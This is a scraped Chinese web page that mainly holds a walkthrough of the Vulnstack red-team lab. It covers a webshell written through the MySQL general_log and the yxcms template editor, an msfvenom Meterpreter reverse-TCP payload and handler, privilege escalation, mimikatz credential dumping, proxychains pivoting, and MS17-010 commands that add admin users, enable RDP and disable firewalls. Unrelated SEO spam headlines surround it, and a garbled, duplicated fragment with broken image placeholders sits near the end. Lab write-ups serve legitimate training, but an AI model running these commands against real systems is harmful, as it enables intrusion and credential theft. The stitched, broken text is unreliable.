当前位置: 首页 > news >正文

帝国cms 网站搬家东莞竞价推广

帝国cms 网站搬家,东莞竞价推广,wordpress plugin development,go语言视频网站开发搭建 靶场下载#xff1a; http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ (13G#xff0c;需要百度网盘会员) 下载好靶场文件后直接解压 直接用虚拟机打开靶场 更改网络ip 需要模拟内网和外网两个网段#xff0c; Win7 虚拟机相当于网关服务器#xff0c;所以需要…搭建 靶场下载 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ (13G需要百度网盘会员) 下载好靶场文件后直接解压 直接用虚拟机打开靶场 更改网络ip 需要模拟内网和外网两个网段 Win7 虚拟机相当于网关服务器所以需要两张网卡一个用来向外网提供web服务一个是通向内网 将 Win7 的网络适配器 1 设置成 VMnet1 仅主机模式内网网络适配器 2 设置成 NAT 模式外网 而 Win2003、Win2008 网络适配器设置成VMnet1仅主机模式(内网)。 网络配置完成这三台虚拟主机默认开机密码都是 hongrisec2019开机提示密码已过期更改为 hongricse2024即可密码太简单会设置错误 在之后可能会用到桥接模式可以根据情况设置 在win7把环境启动其中可以设置一个桥接模式方便打靶 查看IP 访问192.168.129.158 这几台机器都是有防火墙的这里先看一下win7的防火墙和入站规则 接着可以在外面访问一下192.168.129.158 到这里靶场就搭建成功了 开始打靶 攻击机 kali web服务器 win7 域成员 win2003 域控 win2008 目的先穿过防火墙打下web服务器接着再穿过防火墙拿下域内的机器域成员和域控。 打靶方法 端口扫描web路径的发现phpmyadmin渗透 ​ 日志导出getshell yxcms渗透 ​ 编辑模板getshell 上线msfmsf渗透利用msf psexec模板利用ms17_010_command模板利用 打靶 由于在打靶前知道了ip所以直接就不进行信息收集了 直接来扫描端口 nmap -p- 192.168.129.158 -o result.txt/nmap -sV -Pn 192.168.129.158 有80和3306端口开放 phpmyadmin渗透 访问192.168.129.158:80,得到的是一个phpstudy探针的页面可以知道绝对路径 测试一下数据库的连接情况使用root/root弱口令连接测试成功 使用dirsearch工具或者御剑扫描一下存在的web服务 [08:42:52] 200 - 71KB - /phpinfo.php [08:42:52] 301 - 242B - /phpMyAdmin - http://192.168.129.158/phpMyAdmin/ [08:42:52] 301 - 242B - /phpmyadmin - http://192.168.129.158/phpmyadmin/ [08:42:53] 200 - 32KB - /phpmyadmin/ChangeLog [08:42:53] 200 - 2KB - /phpmyadmin/README [08:42:53] 200 - 4KB - /phpmyAdmin/ [08:42:53] 200 - 4KB - /phpMyAdmin/index.php [08:42:53] 200 - 4KB - /phpMyadmin/ [08:42:53] 200 - 4KB - /phpmyadmin/ [08:42:53] 200 - 4KB - /phpmyadmin/index.php [08:42:53] 200 - 4KB - /phpMyAdmin/ 扫描到这么多文件接着就是访问 访问 http://192.168.129.158/phpMyAdmin/ 使用刚刚得到的弱口令进行登录root/root 日志导出getshell 查看日志导出 show variables like ‘general%’; 发现日志导出没有打开接着就要开启日志导出 set global general_log“ON”; 接着设置web路径 set global general_log_file“C:/phpStudy/www/404.php”; 执行select 1 访问http://192.168.129.158/404.php查看日志 接着执行select “?php phpinfo();?”; 接着刷新http://192.168.129.158/404.php查看日志的导出 以上几步操作说明web是可以用日志导出getshell的 最简单的就是可以写入一句话木马执行接着就可以用工具蚁剑连接到后台得到文件 yxcms渗透 访问192.168.129.158/yxcms 查看网页发现用户和密码 根据网页提示访问得到新的网页 直接admin/123456登录 成功登录后台 进入前台模板——模板管理——编辑文件 这里可以直接打开编辑写入webshell 访问http://192.168.129.158/yxcms/protected/apps/default/view/default/info.php 页面什么都没有显示 使用hackbar传入刚刚写入的phpinfo 接着用蚁剑连接 可以进入文件管理和虚拟终端在虚拟终端可以看到用户名及身份 msf上线 先进入msf工具使用页面 在kali使用msf工具生成木马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.129.148 LPORT4444 -f exe 11.exe 成功将木马文件上传到web服务器 文件成功在终端显示 在kali上开启监听 ​ msfconsole #开启msf ​ use exploit/multi/handler ​ set payload windows/meterpreter/reverse_tcp ​ show options #可以查看一下写的内容 ​ set lhost 192.168.33.133 #ip写kali的 ​ set lport 3333 #监听端口 ​ run #启动 设置好kali执行文件getshell 内网信息收集 net time /domain #查看时间服务器 net user /domain #查看域用户 net view /domain #查看有几个域 net view /domain:GOD #查看GOD域情况 nslookup 主机名 #查看域内其他主机 可能ip查不出来 net group “domain computers” /domain #查看域内所有的主机名 net group “domain admins” /domain #查看域管理员 net group “domain controllers” /domain #查看域控 获取目标主机的shell shell #进入模拟终端 chcp 65001 #解决乱码 route print # 打印路由信息 可知内网网段应该是 192.168.52.0/24 首先判断是否在域中域控制器一般集成了DNS服务通过 ipconfig /all即可简单判断 域名为god.org,还可以使用下面这种方法查看 net view /domain #查询当前主机是否加入域如果加入则列出域名 查看域内信息 net config Workstation #查看计算机名、全名、用户名、系统版本、工作站、域、登录域 接着定位域控 域控的域名即 owa.god.org 用 ping 即可反查出域控server 2008ip为192.168.52.138 再来看一下域内的其它主机OWA是域控STU1是win7所以剩下的就是域成员得到ip为192.168.52.141 再来看一下域管理员可以看到这里我们获得的 Administrator 就是域控OWA的域管理员 net group “domain admins” /domain #查询域管理员 看一下域里有几个用户 net user /domain #查看域用户只有域管才能执行 提权 getuid #查看服务器权限 getsystem #提权 getuid #查看是否提权成功 成功得到系统权限 获取域用户的密码信息 方法一加载 kiwi模块 load kiwi #加载kiwi模块 creds_all #列出所有凭据 方法二加载mimikatz模块再尝试加载 mimikatz 模块加载模块前需要先将meterpreter迁移到64位的进程 ps #查看进程 migrate PID load mimikatz kiwi_cmd sekurlsa::logonpasswords 方法一不知道为什么一直显示不出来 方法二 ps 得到账户及登录密码密码和我一开始更改的一样 目前为止获得的内网信息有 域名god.org 域内有五个用户Administrator、Guest、liukaifeng01、ligang、krbtgt 域内三台主机OWA、ROOT-TVI862UBEH(192.168.52.141)、STU1(win7) 域控OWA(192.168.52.138) win7内网ip192.168.52.143 跨网段横向渗透 msf添加代理 添加路由 run autoroute -s 192.168.52.0/24 #添加路由 run autoroute -p #查看路由信息 配置代理 background use auxiliary/server/socks_proxy set SRVHOST 127.0.0.1这里因为是本机可以写本地ip run jobs 然后在 proxychains 的配置文件 /etc/proxychains.conf添加本机的1080端口 socks4 127.0.0.1 1080 域成员渗透 首先看下域成员开放的端口全扫很久这里只扫描一些高危端口 proxychains nmap -sV -Pn -p 22,80,135,443,445,3389 192.168.52.141 这里看见开着445端口试着用一下ms17_010 use auxiliary/admin/smb/ms17_010_command set COMMAND net user set RHOST 192.168.52.141 run 添加一个用户尝试远程登录一下 还是使用这个模块依次执行下面命令 set command net user bbb qwer123 /add #添加用户 run set command net localgroup administrators bbb /add #管理员权限 run set command ‘REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’ #开启3389端口 run set command netsh advfirewall set allprofiles state off #关闭防火墙 run 接着远程登录 proxychains rdesktop 192.168.52.141 使用刚刚添加的新用户进行登录而且原来的用户账户及密码也拿到了 对于另一台机器192.168.52.138的获取也是一样的操作 先连接创建新用户赋予其权限 Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’ #开启3389端口 run set command netsh advfirewall set allprofiles state off #关闭防火墙 run [外链图片转存中…(img-DoUuluZW-1734439783074)][外链图片转存中…(img-pquuSHzj-1734439783074)][外链图片转存中…(img-QvoP0AOc-1734439783074)]接着远程登录 proxychains rdesktop 192.168.52.141 使用刚刚添加的新用户进行登录而且原来的用户账户及密码也拿到了 对于另一台机器192.168.52.138的获取也是一样的操作 先连接创建新用户赋予其权限 然后直接远程登录
http://www.hkea.cn/news/14412009/

相关文章:

  • 专门做金融的招聘网站河北建筑工程学院招生信息网
  • 厦门网站建设ui镇江市城市建设档案馆网站
  • 济源网站优化wordpress 带水印
  • 网站开发需要学什么技能施工企业账务处理
  • 泉州做网站优化公司wordpress开源app
  • 旅游网站模板 手机wordpress 去除rss
  • 电子商务网站开发与应用论文旅游网站设计asp
  • 策划类网站怎样做某个网站有更新的提醒
  • html网站首页广州古柏广告策划有限公司
  • linux下用python做网站网站设计模版免费下载
  • 做网站需要展示工厂么南通网站建设找哪家
  • 视频网站开发前景如何青岛建站
  • 一篇网站设计小结网站建设公司 成都
  • 网站推广效果不好原因是北京做招聘网站的公司
  • 做网站构建公司网站设计
  • pageadmin 制作网站怎么绑定域名怎么做仲博注册网站
  • ps做图 游戏下载网站网站备案撤销
  • 临沂网站制作专业重庆丰都建设局网站
  • 建设部评职称查询网站如何建立网址的步骤
  • 西宁市建设网站多少钱网站被入侵后需做的检测(1)
  • 建筑类网站建设国际新闻快报社
  • 重庆建站网站流程及费用网站添加新闻栏怎么做
  • 如何查询网站的空间大小东莞工作招聘网
  • 做移动网站点击软件电子商务网站建设毕业设计
  • 网站建设 翰臣科技建设网站要什么手续
  • 如何做自己的在线作品网站多用户商城系统哪种好用
  • 怎样建设档案馆网站360建筑网官方网站
  • 中小企业建站平台美食类网站开发需求分析
  • 网站漂浮广告怎么做湖南住房和城乡建设厅官网
  • 砀山做网站免费推广网站2023mmm